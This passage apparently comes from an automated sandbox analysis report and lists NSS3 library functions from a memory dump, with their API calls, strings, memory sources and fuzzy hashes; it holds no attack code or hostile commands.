                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                      • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                      • Opcode ID: 234b9fdb32172bf0b7010a056cd347d8a294a0079b3cec7361a0cccaa4dd6fb0
                                                                                                                                                                                                                                                      • Instruction ID: 6153c19723dd482b28a669b5c0c3acdf54a3cfcc9ea85e28885e5c487b7594fe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 234b9fdb32172bf0b7010a056cd347d8a294a0079b3cec7361a0cccaa4dd6fb0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701C0B6901154ABDF01AF64DC85CAB3F3CEF86368B024069FD0997B01D731EA5086A2
                                                                                                                                                                                                                                                      Function 6C561C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Fl,?,?,6C464E1D), ref: 6C561C8A
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C561CB6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                      • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Fl
                                                                                                                                                                                                                                                      • API String ID: 1840970956-1300945822
                                                                                                                                                                                                                                                      • Opcode ID: 2049cc8b4f8600980df4b2b975f56f29a7c3e0cf7973a311db0c0aa4f0237b3c
                                                                                                                                                                                                                                                      • Instruction ID: 084cef2e87514878ac3b4a3e0c2eb4077d46f2b90b5b52c0c6a12f89f1b917ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2049cc8b4f8600980df4b2b975f56f29a7c3e0cf7973a311db0c0aa4f0237b3c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB0124B1A001404BE700BE69D802D7A73E5EF8634CB15086DE8858BB12EB32E867C791
                                                                                                                                                                                                                                                      Function 6C544D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544DC3
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544DE0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544DCB
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C544DDA
                                                                                                                                                                                                                                                      • invalid, xrefs: 6C544DB8
                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C544DBD
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C544DD5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                      • Opcode ID: 040788ad503a677ac242e584c39d246b476a7af69c8f09b7fb688c6b838085e8
                                                                                                                                                                                                                                                      • Instruction ID: 741ef227abc521eb50b642854e55f0976db0fb923224e2c3587710e050772fc1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 040788ad503a677ac242e584c39d246b476a7af69c8f09b7fb688c6b838085e8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2F02E31E549647BD7009556CC22FCE3B555F11319F4A49F0FD047BE52D31AA85083D1
                                                                                                                                                                                                                                                      Function 6C544DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544E30
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544E4D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544E38
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C544E47
                                                                                                                                                                                                                                                      • invalid, xrefs: 6C544E25
                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C544E2A
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C544E42
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                      • Opcode ID: fb347f56a001f36196ccce89d5332f8c434b1168840aa900f20bb000f6ec6591
                                                                                                                                                                                                                                                      • Instruction ID: bc9d2231a3cb27150ed016694d085566f3a71af8302732d619944c26fe5f7ec2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb347f56a001f36196ccce89d5332f8c434b1168840aa900f20bb000f6ec6591
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EF02731EC49282BE71054669C21F8A3B855B11329F0DC5A1EE087BE93D30A987142D3
                                                                                                                                                                                                                                                      Function 6C479FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C47A086
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C47A09B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C47A0B7
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A0E9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C47A11B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C47A12F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C47A148
                                                                                                                                                                                                                                                        • Part of subcall function 6C491A40: PR_Now.NSS3(?,00000000,6C4728AD,00000000,?,6C48F09A,00000000,6C4728AD,6C4793B0,?,6C4793B0,6C4728AD,00000000,?,00000000), ref: 6C491A65
                                                                                                                                                                                                                                                        • Part of subcall function 6C491940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C494126,?), ref: 6C491966
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A1A3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3953697463-0
                                                                                                                                                                                                                                                      • Opcode ID: 918f0944c2384415ff1c5f40b1ab6472882621b14a19de4f6a9bf468ce43d056
                                                                                                                                                                                                                                                      • Instruction ID: 99d2f08a55aad4e1a3ce0c93ec4870eb4311f1db612ed44352b16e53c84c6448
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 918f0944c2384415ff1c5f40b1ab6472882621b14a19de4f6a9bf468ce43d056
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB5106B5A013409BEB20DF69CC48EEB77B8EF86309B15442DDC2997B01EB31E945C6B1
                                                                                                                                                                                                                                                      Function 6C4B0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000,?,?), ref: 6C4B0CB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DC1
                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0F10: malloc.MOZGLUE(00000001), ref: 6C4D0F30
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0DFF
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000), ref: 6C4B0E16
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E53
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000), ref: 6C4B0E65
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E79
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                                                        • Part of subcall function 6C48B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C491397,00000000,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C48B1A0: free.MOZGLUE(5B5F5EC0,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C4888AE,-00000008), ref: 6C488A04
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: EnterCriticalSection.KERNEL32(?), ref: 6C488A15
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: memset.VCRUNTIME140(6C4888AE,00000000,00000132), ref: 6C488A27
                                                                                                                                                                                                                                                        • Part of subcall function 6C4889E0: PR_Unlock.NSS3(?), ref: 6C488A35
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1601681851-0
                                                                                                                                                                                                                                                      • Opcode ID: 4d9a00a378e8ddd31add2964990aff2bcfd88765bf11fa8f7aa0722309b23554
                                                                                                                                                                                                                                                      • Instruction ID: 5ddcf4292c888d882b081e19fdd0da6f7d75ee0144b5b777cca20d11710a0f40
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d9a00a378e8ddd31add2964990aff2bcfd88765bf11fa8f7aa0722309b23554
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB51C6F5E012105FEB10DF64DD81EAB37A8AF45259F150068EC09ABB52FB31ED1586F2
                                                                                                                                                                                                                                                      Function 6C466E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6C466ED8
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6C466EE5
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C466FA8
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?), ref: 6C466FDB
                                                                                                                                                                                                                                                      • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C466FF0
                                                                                                                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6C467010
                                                                                                                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6C46701D
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C467052
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1920323672-0
                                                                                                                                                                                                                                                      • Opcode ID: e87b4112820354a231026f7c79cffd70877f2e6a104a22d4f6f86de77dcf55a1
                                                                                                                                                                                                                                                      • Instruction ID: 289875c5c39dfbca6e357bfb23965bd9553f6e8b20e59c6a2f7255d130917c5b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e87b4112820354a231026f7c79cffd70877f2e6a104a22d4f6f86de77dcf55a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B61E5B1E192158FDB04CF66D800FEEB7B2AF85308F184169D855ABF59E7319C06CBA0
                                                                                                                                                                                                                                                      Function 6C4D8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C4D7313), ref: 6C4D8FBB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D9012
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D903C
                                                                                                                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D909E
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90DB
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90F1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D906B
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C4D7313), ref: 6C4D9128
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3590961175-0
                                                                                                                                                                                                                                                      • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                      • Instruction ID: afab832b605e15187ad5d9e4e1d774c4a4a844141734022c53b201dfc6784d51
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF518F71A002028BFB10EF6ADC64F2AB3F9AF54359F164129D915D7B61EB32F805CB91
                                                                                                                                                                                                                                                      Function 6C489C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C488850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
                                                                                                                                                                                                                                                        • Part of subcall function 6C488850: PR_NewLock.NSS3 ref: 6C488874
                                                                                                                                                                                                                                                        • Part of subcall function 6C488850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C489CAD
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
